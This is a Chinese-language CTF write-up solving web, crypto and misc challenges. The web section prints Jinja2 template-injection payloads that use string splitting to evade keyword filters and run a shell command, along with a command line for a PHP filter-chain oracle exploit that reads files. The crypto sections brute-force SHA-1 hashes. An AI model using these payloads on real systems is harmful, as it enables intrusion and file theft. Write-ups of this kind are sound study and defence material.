Web
easy_flask
简单尝试一下{{2*"1"}},确认为jinja2模板注入
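判断 os 模块相关的类在 __subclasses__() 列表中的位置为 133。下面的 payload 用字符串拼接把 __class__、__subclasses__、popen 拆开,应是为了绕过关键字过滤;这也说明仅靠关键字黑名单防不住模板注入,根本的修复是不要把用户输入当作模板来渲染。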
{{()['__cla'+'ss__'].__base__['__subcl'+'asses__']()[133]}}
{{''['__cla'+'ss__'].__base__['__subcl'+'asses__']()[133].__init__.__globals__['pop'+'en']('cat flag').read()}}}
file_copy
github脚本直接跑
https://github.com/synacktiv/php_filter_chains_oracle_exploit?tab=readme-ov-file
python filters_chain_oracle_exploit.py --target url --file '/flag' --parameter path
Crypto
你是小哈斯
直接一条一条爆破。比赛时没做出来,是赛后借鉴网上的脚本做的
import hashlib
import itertools
import string
# Digests to recover, in message order. Each entry is 40 hex characters,
# i.e. a SHA-1 digest (not a CRC). Repeated values are the same plaintext
# fragment occurring again, which is what lets a small lookup table
# reverse the whole list.
hash_list = [
    "356a192b7913b04c54574d18c28d46e6395428ab",
    "da4b9237bacccdf19c0760cab7aec4a8359010b0",
    "77de68daecd823babbb58edb1c8e14d7106e83bb",
    "1b6453892473a467d07372d45eb05abc2031647a",
    "ac3478d69a3c81fa62e60f5c3696165a4e5e6ac4",
    "c1dfd96eea8cc2b62785275bca38ac261256e278",
    "902ba3cda1883801594b6e1b452790cc53948fda",
    "fe5dbbcea5ce7e2988b8c69bcfdfde8904aabc1f",
    "0ade7c2cf97f75d009975f4d720d1fa6c19f4897",
    "b6589fc6ab0dc82cf12099d1c2d40ab994e8410c",
    "3bc15c8aae3e4124dd409035f32ea2fd6835efc9",
    "21606782c65e44cac7afbb90977d8b6f82140e76",
    "22ea1c649c82946aa6e479e1ffd321e4a318b1b0",
    "aff024fe4ab0fece4091de044c58c9ae4233383a",
    "58e6b3a414a1e090dfc6029add0f3555ccba127f",
    "4dc7c9ec434ed06502767136789763ec11d2c4b7",
    "8efd86fb78a56a5145ed7739dcb00c78581c5375",
    "95cb0bfd2977c761298d9624e4b4d4c72a39974a",
    "51e69892ab49df85c6230ccc57f8e1d1606caccc",
    "042dc4512fa3d391c5170cf3aa61e6a638f84342",
    "7a81af3e591ac713f81ea1efe93dcf36157d8376",
    "516b9783fca517eecbd1d064da2d165310b19759",
    "4a0a19218e082a343a1b17e5333409af9d98f0f5",
    "07c342be6e560e7f43842e2e21b774e61d85f047",
    "86f7e437faa5a7fce15d1ddcb9eaeaea377667b8",
    "54fd1711209fb1c0781092374132c66e79e2241b",
    "60ba4b2daa4ed4d070fec06687e249e0e6f9ee45",
    "d1854cae891ec7b29161ccaf79a24b00c274bdaa",
    "7a81af3e591ac713f81ea1efe93dcf36157d8376",
    "53a0acfad59379b3e050338bf9f23cfc172ee787",
    "042dc4512fa3d391c5170cf3aa61e6a638f84342",
    "a0f1490a20d0211c997b44bc357e1972deab8ae3",
    "53a0acfad59379b3e050338bf9f23cfc172ee787",
    "4a0a19218e082a343a1b17e5333409af9d98f0f5",
    "07c342be6e560e7f43842e2e21b774e61d85f047",
    "86f7e437faa5a7fce15d1ddcb9eaeaea377667b8",
    "54fd1711209fb1c0781092374132c66e79e2241b",
    "c2b7df6201fdd3362399091f0a29550df3505b6a",
    "86f7e437faa5a7fce15d1ddcb9eaeaea377667b8",
    "a0f1490a20d0211c997b44bc357e1972deab8ae3",
    "3c363836cf4e16666669a25da280a1865c2d2874",
    "4a0a19218e082a343a1b17e5333409af9d98f0f5",
    "54fd1711209fb1c0781092374132c66e79e2241b",
    "27d5482eebd075de44389774fce28c69f45c8a75",
    "5c2dd944dde9e08881bef0894fe7b22a5c9c4b06",
    "13fbd79c3d390e5d6585a21e11ff5ec1970cff0c",
    "07c342be6e560e7f43842e2e21b774e61d85f047",
    "395df8f7c51f007019cb30201c49e884b46b92fa",
    "11f6ad8ec52a2984abaafd7c3b516503785c2072",
    "84a516841ba77a5b4648de2cd0dfcb30ea46dbb4",
    "7a38d8cbd20d9932ba948efaa364bb62651d5ad4",
    "e9d71f5ee7c92d6dc9e92ffdad17b8bd49418f98",
    "d1854cae891ec7b29161ccaf79a24b00c274bdaa",
    "6b0d31c0d563223024da45691584643ac78c96e8",
    "5c10b5b2cd673a0616d529aa5234b12ee7153808",
    "4a0a19218e082a343a1b17e5333409af9d98f0f5",
    "07c342be6e560e7f43842e2e21b774e61d85f047",
    "86f7e437faa5a7fce15d1ddcb9eaeaea377667b8",
    "54fd1711209fb1c0781092374132c66e79e2241b",
    "60ba4b2daa4ed4d070fec06687e249e0e6f9ee45",
    "54fd1711209fb1c0781092374132c66e79e2241b",
    "86f7e437faa5a7fce15d1ddcb9eaeaea377667b8",
    "6b0d31c0d563223024da45691584643ac78c96e8",
    "58e6b3a414a1e090dfc6029add0f3555ccba127f",
    "53a0acfad59379b3e050338bf9f23cfc172ee787",
    "84a516841ba77a5b4648de2cd0dfcb30ea46dbb4",
    "22ea1c649c82946aa6e479e1ffd321e4a318b1b0",
    "e9d71f5ee7c92d6dc9e92ffdad17b8bd49418f98",
    "53a0acfad59379b3e050338bf9f23cfc172ee787",
    "042dc4512fa3d391c5170cf3aa61e6a638f84342",
    "a0f1490a20d0211c997b44bc357e1972deab8ae3",
    "042dc4512fa3d391c5170cf3aa61e6a638f84342",
    "a0f1490a20d0211c997b44bc357e1972deab8ae3",
    "53a0acfad59379b3e050338bf9f23cfc172ee787",
    "84a516841ba77a5b4648de2cd0dfcb30ea46dbb4",
    "11f6ad8ec52a2984abaafd7c3b516503785c2072",
    "95cb0bfd2977c761298d9624e4b4d4c72a39974a",
    "395df8f7c51f007019cb30201c49e884b46b92fa",
    "c2b7df6201fdd3362399091f0a29550df3505b6a",
    "3a52ce780950d4d969792a2559cd519d7ee8c727",
    "86f7e437faa5a7fce15d1ddcb9eaeaea377667b8",
    "a0f1490a20d0211c997b44bc357e1972deab8ae3",
    "3c363836cf4e16666669a25da280a1865c2d2874",
    "4a0a19218e082a343a1b17e5333409af9d98f0f5",
    "54fd1711209fb1c0781092374132c66e79e2241b",
    "27d5482eebd075de44389774fce28c69f45c8a75",
    "5c2dd944dde9e08881bef0894fe7b22a5c9c4b06",
    "13fbd79c3d390e5d6585a21e11ff5ec1970cff0c",
    "07c342be6e560e7f43842e2e21b774e61d85f047",
    "395df8f7c51f007019cb30201c49e884b46b92fa",
    "11f6ad8ec52a2984abaafd7c3b516503785c2072",
    "84a516841ba77a5b4648de2cd0dfcb30ea46dbb4",
    "7a38d8cbd20d9932ba948efaa364bb62651d5ad4",
    "e9d71f5ee7c92d6dc9e92ffdad17b8bd49418f98",
    "d1854cae891ec7b29161ccaf79a24b00c274bdaa",
    "6b0d31c0d563223024da45691584643ac78c96e8",
    "5c10b5b2cd673a0616d529aa5234b12ee7153808",
    "4a0a19218e082a343a1b17e5333409af9d98f0f5",
    "07c342be6e560e7f43842e2e21b774e61d85f047",
    "86f7e437faa5a7fce15d1ddcb9eaeaea377667b8",
    "54fd1711209fb1c0781092374132c66e79e2241b",
    "60ba4b2daa4ed4d070fec06687e249e0e6f9ee45",
    "54fd1711209fb1c0781092374132c66e79e2241b",
]
# Candidate plaintexts: every short string a single digest might encode.
# The whole space is under 50,000 entries, which is why hashing short
# fragments one by one gives no secrecy.
candidates = set()

# Decimal strings "0" .. "9999".
candidates.update(str(number) for number in range(10000))

# Lowercase words of one to three letters.
lowercase = string.ascii_lowercase
for width in (1, 2, 3):
    candidates.update(
        "".join(letters) for letters in itertools.product(lowercase, repeat=width)
    )

# Uppercase words of one to three letters.
uppercase = string.ascii_uppercase
for width in (1, 2, 3):
    candidates.update(
        "".join(letters) for letters in itertools.product(uppercase, repeat=width)
    )

# Single punctuation characters; iterating the string yields one at a time.
symbols = "!@#$%^&*()-_=+[]{},.;:\"'`~<>?/\\|"
candidates.update(symbols)

# Single whitespace characters.
candidates.update((" ", "\t", "\n"))
# Precompute digest -> plaintext for every candidate. Unsalted SHA-1 over
# such a small input space is reversed by a plain table lookup.
sha1_dict = {}
print("[*] 准备生成 SHA-1 字典,共有候选明文数量 =", len(candidates), "请稍候...")
sha1_dict.update(
    (hashlib.sha1(text.encode("utf-8")).hexdigest(), text) for text in candidates
)
print("[*] 字典生成完成。开始匹配...")

# Walk the targets in order; recovered fragments are joined as-is, and a
# digest with no table entry is reported and contributes nothing.
recovered = []
for digest in hash_list:
    fragment = sha1_dict.get(digest)
    if fragment is None:
        print(f"{digest} => [未匹配]")
        continue
    recovered.append(fragment)
    print(f"{digest} => {fragment}")
matched_plaintexts = "".join(recovered)

# Print the concatenated result.
print("\n[*] 匹配的明文拼接结果:")
print(matched_plaintexts)
print("[*] 匹配完成。若还有未匹配,则可进一步扩大字典或检查是否有特殊格式。")
爆破结果
flag{game_cqb_isis_cxyz}
通往哈希的旅程
试了很多种最后用的sha1爆破出来了
import hashlib
# SHA-1 digest to invert (40 hex characters).
target_hash = "ca12fd8250972ec363a16593356abb1f3cf3a16d"

# The search space is the 10**8 eleven-digit numbers 18800000000 ..
# 18899999999. A space that small can be enumerated outright, so an
# unsalted fast hash does not hide the number.
found = next(
    (
        text
        for text in map(str, range(18800000000, 18900000000))
        if hashlib.sha1(text.encode()).hexdigest() == target_hash
    ),
    None,
)
if found is not None:
    print(f"找到匹配的号码: {found}")
else:
    print("未找到匹配的号码")
flag{18876011645}
Misc
简单镜像提取
流量包文件分离一下发现有一个镜像文件
解压后用工具对镜像进行提取,发现有一个被删除的销售报表
恢复后打开就可以直接看到flag
flag{E7A10C15E26AA5750070EF756AAA1F7C}
简单算数
根据提示进行爆破
# Single-byte XOR: only 128 keys are possible here, so each one is tried
# and printed, and the readable line is picked out by eye.
ciphertext = "ys~xdg/m@]mjkz@vl@z~lf>b"
for key in range(128):
    plaintext = "".join(chr(ord(char) ^ key) for char in ciphertext)
    print(f"Key: {key}, Plaintext: {plaintext}")
flag{x0r_Brute_is_easy!}
压力大,写个脚本吧
脚本把所有的压缩包解压
import zipfile
import os
import base64
import re
# Working directory: holds the archives and their password_<N>.txt files,
# and receives everything that is extracted.
base_dir = "path_to_your_zip_files"

# Output file; extract_zip appends each archive's password text to it.
flag_file = os.path.join(base_dir, "flag.txt")
# 递归解压压缩包
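def extract_zip(zip_path, target_dir):
    """Extract a password-protected ``zip_<N>.zip`` and every archive nested in it.

    The password for ``zip_<N>.zip`` is read from ``password_<N>.txt`` in
    *target_dir* and Base64-decoded before use. The Base64 text itself (not
    the decoded bytes) is appended to the module-level ``flag_file``.

    Args:
        zip_path: Path of the archive to open.
        target_dir: Directory holding the password files; extracted members
            are written here too.

    Returns:
        None. Progress and failures are reported with ``print``. Any
        exception is caught and printed, so one bad archive does not abort
        the run.

    NOTE(review): nothing here limits nesting depth or total extracted
    size, so only run it on archives from a trusted source, in a scratch
    directory.
    """
    try:
        # Archive file name without its directory part.
        zip_file_name = os.path.basename(zip_path)
        # The numeric id in the name selects the matching password file.
        match = re.match(r"zip_(\d+)\.zip", zip_file_name)
        if not match:
            print(f"无法从文件名提取编号: {zip_file_name}")
            return

        zip_number = match.group(1)
        password_file = os.path.join(target_dir, f"password_{zip_number}.txt")
        # Printed to help debugging.
        print(f"密码文件路径: {password_file}")
        if not os.path.exists(password_file):
            print(f"密码文件 {password_file} 不存在!")
            return

        with open(password_file, 'r') as pf:
            password_base64 = pf.read().strip()
        password = base64.b64decode(password_base64)
        with open(flag_file, 'a') as flag_f:
            flag_f.write(f"{password_base64}")
        print(f"密码 {zip_number} 已写入 flag.txt")

        # Extract member by member and keep the path extract() actually
        # wrote. Member names come from the archive and are untrusted:
        # extract() normalises them, while re-joining the raw name onto
        # target_dir could point outside it.
        nested_zip_paths = []
        with zipfile.ZipFile(zip_path, 'r') as zip_ref:
            for member in zip_ref.infolist():
                extracted_path = zip_ref.extract(member, target_dir, pwd=password)
                if member.filename.endswith('.zip'):
                    nested_zip_paths.append(extracted_path)
        print(f"成功解压: {zip_path}")

        # Recurse only after the parent archive is closed, so a long chain
        # of nested archives does not hold one open handle per level.
        for nested_zip_path in nested_zip_paths:
            print(f"找到嵌套的压缩包: {nested_zip_path}")
            extract_zip(nested_zip_path, target_dir)
    except Exception as e:
        # Deliberate best-effort: report the failure and let the caller go on.
        print(f"解压失败: {zip_path}, 错误: {e}")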
# Outermost archive to start from; it is looked up inside base_dir.
zip_file = "zip_99.zip"
zip_path = os.path.join(base_dir, zip_file)

# Start from an empty flag.txt so passwords from an earlier run are not kept.
if os.path.exists(flag_file):
    os.remove(flag_file)

# Make sure the working directory exists.
if not os.path.exists(base_dir):
    os.makedirs(base_dir)

# Extract the whole chain of nested archives.
extract_zip(zip_path, base_dir)
在最后一个压缩包里有个提示;对各个 txt 文件分析后,发现 0 号的 password 是 89504e47,也就是 PNG 文件头(89 50 4E 47)的十六进制
直接合并去除末尾无用的FG,得到图片
flag{_PASSWORDs_is_fl@g!_}
See anything in these pics
aztec 扫码,识别出的提示是 5,尝试爆破加密的压缩包
flag{opium_00pium}